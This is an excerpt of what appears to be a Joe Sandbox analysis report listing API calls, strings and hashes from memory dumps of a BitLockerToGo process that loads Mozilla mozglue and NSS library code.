                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                      • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                      • API String ID: 2238633743-1964193996
                                                                                                                                                      • Opcode ID: 7de9f934ec18aaa3146e5f6940cc9bf23cc6af654f21b2b55bf3c6887b540a69
                                                                                                                                                      • Instruction ID: fdb433e7effeefcd3de549827b7a7938c891278e7d73b8b8984880aafc923634
                                                                                                                                                      • Opcode Fuzzy Hash: 7de9f934ec18aaa3146e5f6940cc9bf23cc6af654f21b2b55bf3c6887b540a69
                                                                                                                                                      • Instruction Fuzzy Hash: 7F513D716117225B9B329F368E4C92F3AB9AB1728D7504C35E911E2B41FBB0D810DBB0
                                                                                                                                                      APIs
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C80582D), ref: 6C83CC27
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C80582D), ref: 6C83CC3D
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C86FE98,?,?,?,?,?,6C80582D), ref: 6C83CC56
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C80582D), ref: 6C83CC6C
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C80582D), ref: 6C83CC82
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C80582D), ref: 6C83CC98
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C80582D), ref: 6C83CCAE
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C83CCC4
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C83CCDA
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C83CCEC
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C83CCFE
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C83CD14
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C83CD82
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C83CD98
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C83CDAE
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C83CDC4
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C83CDDA
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C83CDF0
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C83CE06
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C83CE1C
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C83CE32
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C83CE48
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C83CE5E
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C83CE74
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C83CE8A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: strcmp
                                                                                                                                                      • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                      • API String ID: 1004003707-2809817890
                                                                                                                                                      • Opcode ID: 66855b923c29c1d169996c0e8542f6778eb37dd129df91c908475444e8d7270a
                                                                                                                                                      • Instruction ID: bd20e17b1a009a2908f056818904487ef003b867dfa7bc79d218ba11bdee0271
                                                                                                                                                      • Opcode Fuzzy Hash: 66855b923c29c1d169996c0e8542f6778eb37dd129df91c908475444e8d7270a
                                                                                                                                                      • Instruction Fuzzy Hash: 4551659190527911FE32319A6F10BAA3405EB5224BF107E3AF90DA6F83FF09D60985F7
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C804730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C8044B2,6C87E21C,6C87F7F8), ref: 6C80473E
                                                                                                                                                        • Part of subcall function 6C804730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C80474A
                                                                                                                                                      • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C8044BA
                                                                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C8044D2
                                                                                                                                                      • InitOnceExecuteOnce.KERNEL32(6C87F80C,6C7FF240,?,?), ref: 6C80451A
                                                                                                                                                      • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C80455C
                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 6C804592
                                                                                                                                                      • InitializeCriticalSection.KERNEL32(6C87F770), ref: 6C8045A2
                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000008), ref: 6C8045AA
                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000018), ref: 6C8045BB
                                                                                                                                                      • InitOnceExecuteOnce.KERNEL32(6C87F818,6C7FF240,?,?), ref: 6C804612
                                                                                                                                                      • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C804636
                                                                                                                                                      • LoadLibraryW.KERNEL32(user32.dll), ref: 6C804644
                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C80466D
                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C80469F
                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8046AB
                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8046B2
                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8046B9
                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8046C0
                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C8046CD
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 6C8046F1
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C8046FD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                      • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                      • API String ID: 1702738223-3894940629
                                                                                                                                                      • Opcode ID: fab5164305bd2faffc8ee897736872a9eb6c44dfeb0e42b05817f02988928249
                                                                                                                                                      • Instruction ID: e5484d9e3e55312c30a1e9c426064dbe2f05ecbf6c6c59a88c21ed032198f8a8
                                                                                                                                                      • Opcode Fuzzy Hash: fab5164305bd2faffc8ee897736872a9eb6c44dfeb0e42b05817f02988928249
                                                                                                                                                      • Instruction Fuzzy Hash: A061F2B16442589EEB318F61CE49BAD7BB8EBE330CF048868E5149B641F7748944CBB0
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C89CA30: EnterCriticalSection.KERNEL32(?,?,?,6C8FF9C9,?,6C8FF4DA,6C8FF9C9,?,?,6C8C369A), ref: 6C89CA7A
                                                                                                                                                        • Part of subcall function 6C89CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C89CB26
                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,6C8ABE66), ref: 6C9E6E81
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C8ABE66), ref: 6C9E6E98
                                                                                                                                                      • sqlite3_snprintf.NSS3(?,00000000,6CA4AAF9,?,?,?,?,?,?,6C8ABE66), ref: 6C9E6EC9
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C8ABE66), ref: 6C9E6ED2
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C8ABE66), ref: 6C9E6EF8
                                                                                                                                                      • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C8ABE66), ref: 6C9E6F1F
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C8ABE66), ref: 6C9E6F28
                                                                                                                                                      • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C8ABE66), ref: 6C9E6F3D
                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C8ABE66), ref: 6C9E6FA6
                                                                                                                                                      • sqlite3_snprintf.NSS3(?,00000000,6CA4AAF9,00000000,?,?,?,?,?,?,?,6C8ABE66), ref: 6C9E6FDB
                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C8ABE66), ref: 6C9E6FE4
                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C8ABE66), ref: 6C9E6FEF
                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C8ABE66), ref: 6C9E7014
                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,6C8ABE66), ref: 6C9E701D
                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C8ABE66), ref: 6C9E7030
                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C8ABE66), ref: 6C9E705B
                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C8ABE66), ref: 6C9E7079
                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C8ABE66), ref: 6C9E7097
                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C8ABE66), ref: 6C9E70A0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                                                      • String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                      • API String ID: 593473924-707647140
                                                                                                                                                      • Opcode ID: 98f9c3d3daa4a25491e24d2d755dbafdce5a7253310571d16c4255749decd9f0
                                                                                                                                                      • Instruction ID: bb3708d2e97a2c5e15c71d6d21f01f4509393f2d140c5351293bf3d12ac46fa4
                                                                                                                                                      • Opcode Fuzzy Hash: 98f9c3d3daa4a25491e24d2d755dbafdce5a7253310571d16c4255749decd9f0
                                                                                                                                                      • Instruction Fuzzy Hash: 1951AF71A002216BE71696389C51BBF361A5FA6308F144938E90597BC2FB35D81EC2E3
                                                                                                                                                      APIs
                                                                                                                                                      • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974C50
                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974C5B
                                                                                                                                                      • PR_smprintf.NSS3(6CA4AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974C76
                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974CAE
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C974CC9
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C974CF4
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C974D0B
                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974D5E
                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974D68
                                                                                                                                                      • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C974D85
                                                                                                                                                      • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C974DA2
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C974DB9
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C974DCF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                      • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                      • API String ID: 3756394533-2552752316
                                                                                                                                                      • Opcode ID: c61100c99077e4a13861151ce212b7b6b0c3d4e7e6da1c2ec9cdb3484a7a0e5e
                                                                                                                                                      • Instruction ID: b29313a0163978579a1a9ecf57c0cb255b95830f4b265797a5b6713c87902dca
                                                                                                                                                      • Opcode Fuzzy Hash: c61100c99077e4a13861151ce212b7b6b0c3d4e7e6da1c2ec9cdb3484a7a0e5e
                                                                                                                                                      • Instruction Fuzzy Hash: 3941ACB1901142ABDB225F289D406BA3669AF9234CF098134E8154BB03E735E965CFF3
                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C952DEC
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C952E00
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C952E2B
                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C952E43
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C924F1C,?,-00000001,00000000,?), ref: 6C952E74
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C924F1C,?,-00000001,00000000), ref: 6C952E88
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C952EC6
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C952EE4
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C952EF8
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C952F62
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C952F86
                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C), ref: 6C952F9E
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C952FCA
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C95301A
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C95302E
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C953066
                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C953085
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C9530EC
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C95310C
                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C), ref: 6C953124
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C95314C
                                                                                                                                                        • Part of subcall function 6C939180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C96379E,?,6C939568,00000000,?,6C96379E,?,00000001,?), ref: 6C93918D
                                                                                                                                                        • Part of subcall function 6C939180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C96379E,?,6C939568,00000000,?,6C96379E,?,00000001,?), ref: 6C9391A0
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007AD
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007CD
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007D6
                                                                                                                                                        • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C89204A), ref: 6C9007E4
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,6C89204A), ref: 6C900864
                                                                                                                                                        • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C900880
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,6C89204A), ref: 6C9008CB
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008D7
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008FB
                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C95316D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3383223490-0
                                                                                                                                                      • Opcode ID: 64eca545dbff57f17ba150dbe3e48309800e04e895edaa60bd52bb8a42fbeaad
                                                                                                                                                      • Instruction ID: 81133d26f67a8929b78b11d702dba282b498828d2445226768ead7576b1bbc88
                                                                                                                                                      • Opcode Fuzzy Hash: 64eca545dbff57f17ba150dbe3e48309800e04e895edaa60bd52bb8a42fbeaad
                                                                                                                                                      • Instruction Fuzzy Hash: 83F1CE71E00619EFDF00DF64D844AAABBB8BF09318F448169EC04A7711E735E9A6CB90
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C956910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C956943
                                                                                                                                                        • Part of subcall function 6C956910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C956957
                                                                                                                                                        • Part of subcall function 6C956910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C956972
                                                                                                                                                        • Part of subcall function 6C956910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C956983
                                                                                                                                                        • Part of subcall function 6C956910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C9569AA
                                                                                                                                                        • Part of subcall function 6C956910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C9569BE
                                                                                                                                                        • Part of subcall function 6C956910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C9569D2
                                                                                                                                                        • Part of subcall function 6C956910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C9569DF
                                                                                                                                                        • Part of subcall function 6C956910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C956A5B
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C956D8C
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C956DC5
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C956DD6
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C956DE7
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C956E1F
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C956E4B
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C956E72
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C956EA7
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C956EC4
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C956ED5
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C956EE3
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C956EF4
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C956F08
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C956F35
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C956F44
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C956F5B
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C956F65
                                                                                                                                                        • Part of subcall function 6C956C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C95781D,00000000,6C94BE2C,?,6C956B1D,?,?,?,?,00000000,00000000,6C95781D), ref: 6C956C40
                                                                                                                                                        • Part of subcall function 6C956C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C95781D,?,6C94BE2C,?), ref: 6C956C58
                                                                                                                                                        • Part of subcall function 6C956C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C95781D), ref: 6C956C6F
                                                                                                                                                        • Part of subcall function 6C956C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C956C84
                                                                                                                                                        • Part of subcall function 6C956C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C956C96
                                                                                                                                                        • Part of subcall function 6C956C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C956CAA
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C956F90
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C956FC5
                                                                                                                                                      • PK11_GetInternalKeySlot.NSS3 ref: 6C956FF4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1304971872-0
